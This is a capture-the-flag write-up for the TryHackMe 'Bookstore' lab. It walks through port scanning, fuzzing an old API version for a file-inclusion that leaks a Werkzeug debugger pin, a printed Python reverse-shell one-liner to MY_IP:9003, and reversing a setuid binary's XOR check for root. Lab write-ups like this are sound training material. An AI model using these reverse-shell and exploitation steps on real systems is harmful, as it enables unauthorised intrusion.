THM – Bookstore Writeup

This Try Hack Me room really caught my interest, mainly because the title and brief gave nothing away!

From looking back on this room, I wouldn’t really class this as a beginner room but it is a good test none the less!!

Brief

The brief on this was literally user and root flags so nothing really to go on here.

Try Hack Me didn’t give much away!

Starting out and Enumeration

I started out with an nmap scan

nmap -sV -sC -oN ./nmap/initial 10.10.85.253

This gave me the below results

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Book Store
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 3.6.9)
| http-robots.txt: 1 disallowed entry
|_/api </p>
|_http-server-header: Werkzeug/0.14.1 Python/3.6.9
|_http-title: Home

The Website on port 80

I decided to start off with this website so did the below gobuster

gobuster dir -u 10.10.85.253 -w /usr/share/wordlists/dirbuster/big.txt

I got the following results which were not that useful

/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/assets (Status: 301)
/favicon.ico (Status: 200)
/images (Status: 301)
/javascript (Status: 301)
/server-status (Status: 403)

So i found the below login page and tried to see what happened when I login

try hack me bookstore writeup demo images

I couldn’t see anything where the user name and password got any sort of logical response from the site, so i checked the source code and i found the following note;

<!--Still Working on this page will add the backend support soon, also the debugger pin is inside sid's bash history file -->

That explains why the login page didn’t work properly and also gave me a goal that i am looking for a debugger and the pin for it is in sids history.

I considered at this point trying to use hydra against the SSH server using the username sid but decided to check the site nmap found on port 5000.

Werkzeug

I found this site on the port 5000

try hack me bookstore writeup demo images

I decided to scan this using the below gobuster

gobuster dir -u http://10.10.85.253:5000 -w /usr/share/wordlists/dirbuster/big.txt

The results were

/api (Status: 200)
/console (Status: 200)
/robots.txt (Status: 200)

The Api page looked like;

try hack me bookstore writeup demo images

With the console page looking like this;

try hack me bookstore writeup demo images

Fuzzing, Research then more fuzzing!

Since on the API page there were some routes and i knew i was looking for sid’s bash history, i decided to try fuzzing for this with;

wfuzz -u http://10.10.85.253:5000/api/v2/resources/books?FUZZ=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404

And i got the below results

==================================================================
ID           Response   Lines    Word     Chars       Payload                                  
===================================================================

000000486:   200        1 L      1 W      3 Ch        "author"                                 
000000529:   200        1 L      1 W      3 Ch        "id"                                     
000011548:   200        1 L      1 W      3 Ch        "published" 

I already knew these from the API page!

I was sure the answer to this was some kind of LFI but fuzzing wasn’t finding anything i could use against it.

I decided to check out the changelog from Werkzeug and I found there have been 11 security updates upto their present version, at this point I was wondering if the old version was still present, so I changed my command slightly to;

wfuzz -u http://10.10.85.253:5000/api/v1/resources/books?FUZZ=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404

And i got the following results;

===================================================================
ID           Response   Lines    Word     Chars       Payload                                  
===================================================================

000000395:   200        7 L      11 W     116 Ch      XXXXXX                                  
000000486:   200        1 L      1 W      3 Ch        "author"                                 
000000529:   200        1 L      1 W      3 Ch        "id"
000011548:   200        1 L      1 W      3 Ch        "published" 

Ive cleared out the answer it found, but it got me the one i needed straight away and was able to use the below to get sid’s bash history and log into the console;

http://10.10.85.253:5000/api/v1/resources/books?XXXXX=.bash_history
try hack me bookstore writeup demo images

Getting a shell

Since this said it was a python shell I set up a listener on my machine using

nc -lvnp 9003

And then the below command in the debug console

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("MY_IP",9003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

This worked and i had my reverse shell, listing the home directory I found the first flag and another interest file….

try hack me bookstore writeup demo images

I wasn’t sure if the try-harder executable was a joke or not but decided to look into it further!

I need to try harder!

To run this, i first had to upgrade my shell with;

python3 -c "import pty;pty.spawn('/bin/bash')"

When i ran the try-harder file, it wanted a magic number to do whatever it was going to do, I did try a couple of guesses but decided to get the file and see what I could find.

I set up a HTTP server on the target machine with

python3 -m http.server

and then on my machine used

wget http://10.10.85.253:8000/try-harder

Using Ghidra i found the bit i was most interested in;

try hack me bookstore writeup demo images

The bit that’s evaluating the number is;

local_18 = 0x5db3;
puts("What\'s The Magic Number?!");
__isoc99_scanf(&DAT_001008ee,&local_1c);
local_14 = local_1c ^ 0x1116 ^ local_18;
if (local_14 == 0x5dcd21f4) {
  system("/bin/bash -p");

As this is an XOR operator we can absolutely work this out! In the code its evaluating;

local_14 = local_1c ^ 0x1116 ^ local_18

From the code from Ghidra, we know local_14 and local_18, its local_1c we don’t know, but we can work this out by swapping this around to;

 local_1c = local_14 ^ 0x1116 ^ local_18

Now putting in the known values;

local_1c = 0x5dcd21f4 ^ 0x1116 ^ 0x5db3

Now, I know this can look confusing and our objective was to get a magic number and ive just created a math problem!

By doing this all we need to do to get the actual number is in an empty console window, start python3 then type;

0x5dcd21f4 ^ 0x1116 ^ 0x5db3

This will give you the magic number!!

Go back to your reverse shell (or connect again if you pressed ctrl+c like i did….)

Run the try-harder executable again and put the magic number in, this will give you root access.

Then change into the root directory and you have the final flag!!

try hack me bookstore writeup demo images

Conclusion

I really enjoyed this box from Try Hack Me! It was a good challenge and iI liked that it required some use of Ghidra for disassembling, its not something that you come across a lot of in THM but it was really good practice.

If you want to try this for yourself visit Try Hack Me Link

Marc